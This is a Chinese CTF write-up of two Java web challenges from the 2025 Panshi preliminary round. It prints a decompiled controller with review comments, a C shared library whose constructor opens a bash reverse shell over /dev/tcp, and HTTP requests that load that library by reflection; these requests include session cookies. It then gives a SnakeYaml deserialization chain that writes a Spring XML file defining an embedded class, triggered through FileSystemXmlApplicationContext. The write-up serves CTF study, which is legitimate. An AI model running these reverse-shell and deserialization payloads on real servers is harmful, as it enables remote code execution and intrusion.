2025磐石初赛Web两道Java


web-java_ez

VulnController

/**
 * Decompiled request controller from the challenge jar (the nested class below still carries the
 * decompiler's "loaded from" marker). It exposes a server-info endpoint, a multipart upload into
 * /tmp/upload, and a job store whose {@code invokeTarget} strings are later executed by
 * reflection in {@link #invokeMethod(String)}.
 *
 * <p>NOTE(review): this is decompiler output, documented exactly as printed. {@code uploadFile}
 * neither declares nor catches the {@code IOException} that {@code getCanonicalPath()} and
 * {@code transferTo()} throw, and it reads a local that is not definitely assigned on its catch
 * path, so the listing would not compile as-is; the deployed source evidently differs in detail.
 */
public class VulnController {
    // Process-wide job store shared by every request: a raw, unsynchronized HashMap keyed by the
    // client-supplied jobName (written in addJob, read in runJob).
    private static Map<String, ScheduledJob> jobs = new HashMap();
    // Both lists are applied as *substring* tests over the whole invokeTarget string (see
    // containsBlacklist / containsWhitelist), not as exact matches on the parsed class name.
    // The blacklist comparison is case-insensitive, the whitelist comparison is case-sensitive.
    private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
    private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

    /**
     * Returns a handful of JVM / OS properties plus the fixed upload directory.
     *
     * <p>java.home and user.dir hand a caller absolute filesystem locations on the host. No
     * authentication is visible in this class, so treat the endpoint as reachable by anyone who
     * can reach the service.
     *
     * @return map of javaHome, javaVersion, osName, userDir and uploadDir
     */
    @GetMapping({"/server"})
    public Map<String, Object> getServerInfo() {
        Map<String, Object> info = new HashMap<>();
        info.put("javaHome", System.getProperty("java.home"));
        info.put("javaVersion", System.getProperty("java.version"));
        info.put("osName", System.getProperty("os.name"));
        info.put("userDir", System.getProperty("user.dir"));
        info.put("uploadDir", "/tmp/upload");
        // Encodes a literal as GBK and prints the bytes to stdout; this has no effect on the response.
        Charset gbk = Charset.forName("GBK");
        byte[] bytes = gbk.encode("你好").array();
        System.out.println(Arrays.toString(bytes));
        return info;
    }

    /**
     * Stores an uploaded multipart file under /tmp/upload, named by the client-supplied file name.
     *
     * <p>Validation order as printed: null name; name screen (".." delimiter, "/", "\\", leading
     * "."); then a canonical-path prefix check against the upload directory.
     *
     * @param file the multipart upload
     * @return map with a status ({@code BindTag.STATUS_VARIABLE_NAME} is a decompiler substitution
     *         for the literal "status"), a message, and on success the absolute server-side path
     *         of the stored file
     */
    @PostMapping({"/upload"})
    public Map<String, String> uploadFile(@RequestParam("file") MultipartFile file) {
        String originalFilename;
        Map<String, String> result = new HashMap<>();
        try {
            File dir = new File("/tmp/upload");
            if (!dir.exists()) {
                dir.mkdirs();
            }
            originalFilename = file.getOriginalFilename();
        } catch (Exception e) {
            // Records the error but does not return, so the null check below runs with
            // originalFilename unassigned on this path (javac: "might not have been initialized").
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
        }
        if (originalFilename == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "文件名为空");
            return result;
        }
        // getName() already strips everything up to the last platform separator, so on a POSIX
        // host the "/" test below can never fire ("\\" is an ordinary character there and is still
        // screened). CallerDataConverter.DEFAULT_RANGE_DELIMITER is the inlined logback constant
        // for "..", which getName() leaves intact when the whole name is "..".
        String filename = new File(originalFilename).getName();
        if (filename.contains(CallerDataConverter.DEFAULT_RANGE_DELIMITER) || filename.contains("/") || filename.contains("\\") || filename.startsWith(".")) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件名");
            return result;
        }
        // No separator between "/tmp/upload" and the name, so dest is a sibling of the upload
        // directory (e.g. /tmp/uploadREPORT.txt). Since the prefix check below demands
        // "/tmp/upload" + File.separator, every upload would be rejected as listed; the request
        // later on this page loads from /tmp/uploads/, so the deployed constant presumably differs.
        File dest = new File("/tmp/upload" + filename);
        String uploadPathCanonical = new File("/tmp/upload").getCanonicalPath();
        String destCanonical = dest.getCanonicalPath();
        if (!destCanonical.startsWith(uploadPathCanonical + File.separator)) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件路径");
            return result;
        }
        file.transferTo(dest);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        // Echoes the absolute server-side path of the stored file back to the client.
        result.put("path", dest.getAbsolutePath());
        result.put("message", "文件上传成功");
        return result;
    }

    /**
     * Registers a job. Only {@code invokeTarget} is screened (blacklist first, then whitelist);
     * {@code jobName} is not validated, and an existing job with the same name is silently replaced.
     *
     * <p>Review: both screens are substring tests on the raw string, so the whitelist is satisfied
     * by any invokeTarget that merely contains "com.jabaez.FLAG" somewhere (for example inside a
     * quoted argument), while the class actually loaded is whatever precedes '#'. An effective
     * allow-list has to compare the <em>parsed</em> class and method names for equality against
     * a fixed set.
     *
     * @param job JSON-bound job (jobName, invokeTarget, cronExpression)
     * @return status/message map; on success also echoes jobName as "jobId"
     */
    @PostMapping({"/job/add"})
    public Map<String, Object> addJob(@RequestBody ScheduledJob job) {
        Map<String, Object> result = new HashMap<>();
        if (containsBlacklist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "包含非法字符");
            return result;
        }
        if (!containsWhitelist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "目标不在白名单中");
            return result;
        }
        // Unsynchronized put into the shared static map; same-name jobs overwrite each other.
        jobs.put(job.getJobName(), job);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        result.put("message", "任务添加成功");
        result.put("jobId", job.getJobName());
        return result;
    }

    /**
     * Looks up a stored job by name and executes its invokeTarget reflectively.
     *
     * <p>On failure the exception message and the first stack-trace frame are returned to the
     * caller, which exposes internal class and method names; {@code getStackTrace()[0]} would
     * itself throw if the trace were empty.
     *
     * @param jobName key under which the job was stored by addJob
     * @return status/message map, plus "stackTrace" on error
     */
    @PostMapping({"/job/run/{jobName}"})
    public Map<String, Object> runJob(@PathVariable String jobName) {
        Map<String, Object> result = new HashMap<>();
        ScheduledJob job = jobs.get(jobName);
        if (job == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "任务不存在");
            return result;
        }
        try {
            // Return value of the reflective call is discarded.
            invokeMethod(job.getInvokeTarget());
            result.put(BindTag.STATUS_VARIABLE_NAME, "success");
            result.put("message", "任务执行成功");
        } catch (Exception e) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
            result.put("stackTrace", e.getStackTrace()[0].toString());
        }
        return result;
    }

    /**
     * Case-insensitive substring test of {@code str} against every JOB_BLACKLIST entry.
     *
     * @param str the raw invokeTarget; {@code null} is treated as "not blacklisted"
     * @return true if any blacklist token occurs anywhere in the lower-cased string
     */
    private boolean containsBlacklist(String str) {
        if (str == null) {
            return false;
        }
        String lowerStr = str.toLowerCase();
        for (String blackItem : JOB_BLACKLIST) {
            if (lowerStr.contains(blackItem.toLowerCase())) {
                return true;
            }
        }
        return false;
    }

    /**
     * Case-sensitive substring test of {@code str} against every JOB_WHITELIST entry.
     *
     * <p>Note the asymmetry with containsBlacklist: a {@code null} target fails the whitelist
     * (returns false), which addJob then reports as an error.
     *
     * @param str the raw invokeTarget
     * @return true if any whitelist token occurs anywhere in the string
     */
    private boolean containsWhitelist(String str) {
        if (str == null) {
            return false;
        }
        for (String whiteItem : JOB_WHITELIST) {
            if (str.contains(whiteItem)) {
                return true;
            }
        }
        return false;
    }

    /**
     * Parses {@code className#methodName(params)} and invokes it by reflection.
     *
     * <p>The class name goes straight to {@link Class#forName(String)}. The method is looked up
     * with {@code getMethod} (public, including inherited), falling back to
     * {@code getDeclaredMethod} plus {@code setAccessible(true)}, so non-public methods declared
     * on the class are reachable too. Non-static methods are called on a fresh instance from the
     * deprecated {@code Class#newInstance()} (needs an accessible no-arg constructor; anything that
     * constructor throws propagates unwrapped).
     *
     * <p>Argument typing, per top-level comma-separated token (see {@link #splitParams(String)}):
     * {@code 'x'} -> String x; the literal {@code null} ({@code BeanDefinitionParserDelegate.NULL_ELEMENT}
     * is the decompiler's name for it) -> null typed as String; digits only -> int (long digit runs
     * overflow parseInt); {@code true}/{@code false} -> boolean; anything else -> String as written.
     *
     * <p>Review: this is a generic, caller-controlled reflective invocation sink; the only gate is
     * the substring screening in addJob, which does not constrain the parsed class name at all.
     * The mitigation is a fixed mapping from permitted (class, method) pairs to concrete calls,
     * with no {@code Class.forName} on user input.
     *
     * @param invokeTarget the stored target string
     * @return the invoked method's return value (ignored by runJob)
     * @throws IllegalArgumentException if '#' or the parentheses are missing
     * @throws Exception whatever class loading, lookup, instantiation or invocation throws
     */
    private Object invokeMethod(String invokeTarget) throws Exception {
        // Decompiler rendered the char literals as ints: 35 = '#', 40 = '(', 41 = ')'.
        int hashIndex = invokeTarget.indexOf(35);
        if (hashIndex == -1) {
            throw new IllegalArgumentException("Invalid format, expected: className#methodName(params)");
        }
        String className = invokeTarget.substring(0, hashIndex);
        String methodAndParams = invokeTarget.substring(hashIndex + 1);
        int paramStart = methodAndParams.indexOf(40);
        int paramEnd = methodAndParams.lastIndexOf(41);
        // lastIndexOf tolerates parentheses inside arguments, but paramEnd < paramStart (a ')'
        // occurring before the '(') is not rejected and makes the substring below throw.
        if (paramStart != -1 && paramEnd != -1) {
            String methodName = methodAndParams.substring(0, paramStart);
            String paramStr = methodAndParams.substring(paramStart + 1, paramEnd);
            Class<?> clazz = Class.forName(className);
            List<Object> paramValues = new ArrayList<>();
            List<Class<?>> paramTypes = new ArrayList<>();
            if (!paramStr.trim().isEmpty()) {
                String[] params = splitParams(paramStr);
                for (String str : params) {
                    String param = str.trim();
                    if (param.startsWith("'") && param.endsWith("'")) {
                        String value = param.substring(1, param.length() - 1);
                        paramValues.add(value);
                        paramTypes.add(String.class);
                    } else if (param.equals(BeanDefinitionParserDelegate.NULL_ELEMENT)) {
                        paramValues.add(null);
                        paramTypes.add(String.class);
                    } else if (param.matches("\\d+")) {
                        paramValues.add(Integer.valueOf(Integer.parseInt(param)));
                        paramTypes.add(Integer.TYPE);
                    } else if (!param.equals("true") && !param.equals("false")) {
                        // Unquoted, non-numeric, non-boolean tokens are passed through as Strings.
                        paramValues.add(param);
                        paramTypes.add(String.class);
                    } else {
                        paramValues.add(Boolean.valueOf(Boolean.parseBoolean(param)));
                        paramTypes.add(Boolean.TYPE);
                    }
                }
            }
            try {
                Method method = clazz.getMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
                if (Modifier.isStatic(method.getModifiers())) {
                    return method.invoke(null, paramValues.toArray());
                }
                Object instance = clazz.newInstance();
                return method.invoke(instance, paramValues.toArray());
            } catch (NoSuchMethodException e) {
                // Fallback widens the search to non-public methods declared on the class itself.
                Method method2 = clazz.getDeclaredMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
                method2.setAccessible(true);
                if (Modifier.isStatic(method2.getModifiers())) {
                    return method2.invoke(null, paramValues.toArray());
                }
                Object instance2 = clazz.newInstance();
                return method2.invoke(instance2, paramValues.toArray());
            }
        }
        throw new IllegalArgumentException("Invalid method format");
    }

    /**
     * Splits an argument list on commas that are not nested inside (), {} or [].
     *
     * <p>Quotes are not tracked, so a comma inside a quoted string still splits. Closing brackets
     * are never matched against their opener and the nesting level may go negative. A trailing
     * comma yields no trailing empty element; a leading or doubled comma does yield an empty one.
     *
     * @param paramStr text between the outer parentheses
     * @return untrimmed pieces, empty array for an empty input
     */
    private String[] splitParams(String paramStr) {
        List<String> params = new ArrayList<>();
        int bracketLevel = 0;
        int start = 0;
        for (int i = 0; i < paramStr.length(); i++) {
            char c = paramStr.charAt(i);
            if (c != '(' && c != '{' && c != '[') {
                if (c == ')' || c == '}' || c == ']') {
                    bracketLevel--;
                } else if (c == ',' && bracketLevel == 0) {
                    params.add(paramStr.substring(start, i));
                    start = i + 1;
                }
            } else {
                bracketLevel++;
            }
        }
        if (start < paramStr.length()) {
            params.add(paramStr.substring(start));
        }
        return (String[]) params.toArray(new String[0]);
    }

    /* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/VulnController$ScheduledJob.class */
    // JSON-bound request body for /job/add. cronExpression is stored but never read in this class.
    static class ScheduledJob {
        private String jobName;
        private String invokeTarget;
        private String cronExpression;

        ScheduledJob() {
        }

        public String getJobName() {
            return this.jobName;
        }

        public void setJobName(String jobName) {
            this.jobName = jobName;
        }

        public String getInvokeTarget() {
            return this.invokeTarget;
        }

        public void setInvokeTarget(String invokeTarget) {
            this.invokeTarget = invokeTarget;
        }

        public String getCronExpression() {
            return this.cronExpression;
        }

        public void setCronExpression(String cronExpression) {
            this.cronExpression = cronExpression;
        }
    }
}

可以上传任意文件到/tmp/upload,可以写任务并且执行任务时可以调用任意方法

注意这里的白名单和黑名单

    // Excerpt from VulnController: both arrays are checked against the raw invokeTarget with
    // String.contains (the blacklist after lower-casing, the whitelist case-sensitively), so a
    // target passes as long as "com.jabaez.FLAG" appears anywhere in it and none of the blacklist
    // tokens do. Neither test looks at the class name that is actually parsed and loaded.
    private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
    private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

看起来限制得很死,但是我们可以参考若依4.8计划任务RCE

编译上传so文件

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
/* Constructor-attributed function: the dynamic loader runs it as a side effect of loading the
 * library, so a System.load() of an attacker-supplied .so is code execution in the JVM process
 * without any Java method being called. Defensive takeaway: treat java.lang.System#load as a
 * code-execution sink, and never let an upload directory be reachable from a reflective
 * call site that accepts caller-chosen class and method names. */
__attribute__ ((constructor)) void angel(void) {
    system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
}

写任务时加载

POST /api/job/add HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json

{
   "jobName" : "aa3",
   "invokeTarget" : "java.lang.System#load('/tmp/uploads/com.jabaez.FLAG.so')"
}

执行任务

POST /api/job/run/aa3 HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json

反弹shell


ezyaml

image-20250807172356086

SnakeYaml反序列化

这里的黑名单加上不出网限制了打不了JNDI,同时也无法加载远程类

参考java反序列化之SnakeYaml,可以写jar包,但问题是无法加载,所以这题当时就没出

第二天突然看到从 SnakeYaml 看 ClassPathXmlApplicationContext 不出网利用,想起来P牛之前写过的一篇文章ClassPathXmlApplicationContext的不出网利用

既然我们已经可以写入任意文件了,那么也就可以通过加载XML去执行命令,题目过滤了ClassPath自然也就用不了ClassPathXmlApplicationContext,但是还可以利用FileSystemXmlApplicationContext

我们就可以构造出payload,首先写一个xml,这个xml可以用javachains写一个回显马

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
        <property name="arguments">
            <list>
                <value>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</value>

            </list>

        </property>

    </bean>

    <bean id="classLoader" class="javax.management.loading.MLet"/>
    <bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
        <constructor-arg ref="decoder"/>
        <constructor-arg type="int" value="0"/>
        <constructor-arg type="int" value="5129"/>
    </bean>

    <bean factory-bean="clazz" factory-method="newInstance"/>
</beans>
!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File ["./poc.xml"],false],!!java.util.zip.Inflater  { input: !!binary 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 },1048576]]

写入

image-20250807173546897

最后执行

yamlContent=!!org.springframework.context.support.FileSystemXmlApplicationContext [ !!java.lang.String "file:poc.xml" ]

image-20250807173639091

成功将命令执行结果回显出来

还有一种方法就是打LDAP反序列化Jackson原生链
